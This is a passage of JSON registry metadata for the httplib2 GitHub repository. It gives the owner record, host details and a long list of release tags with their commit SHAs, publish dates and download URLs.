analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-23T00:58:12.338Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"pu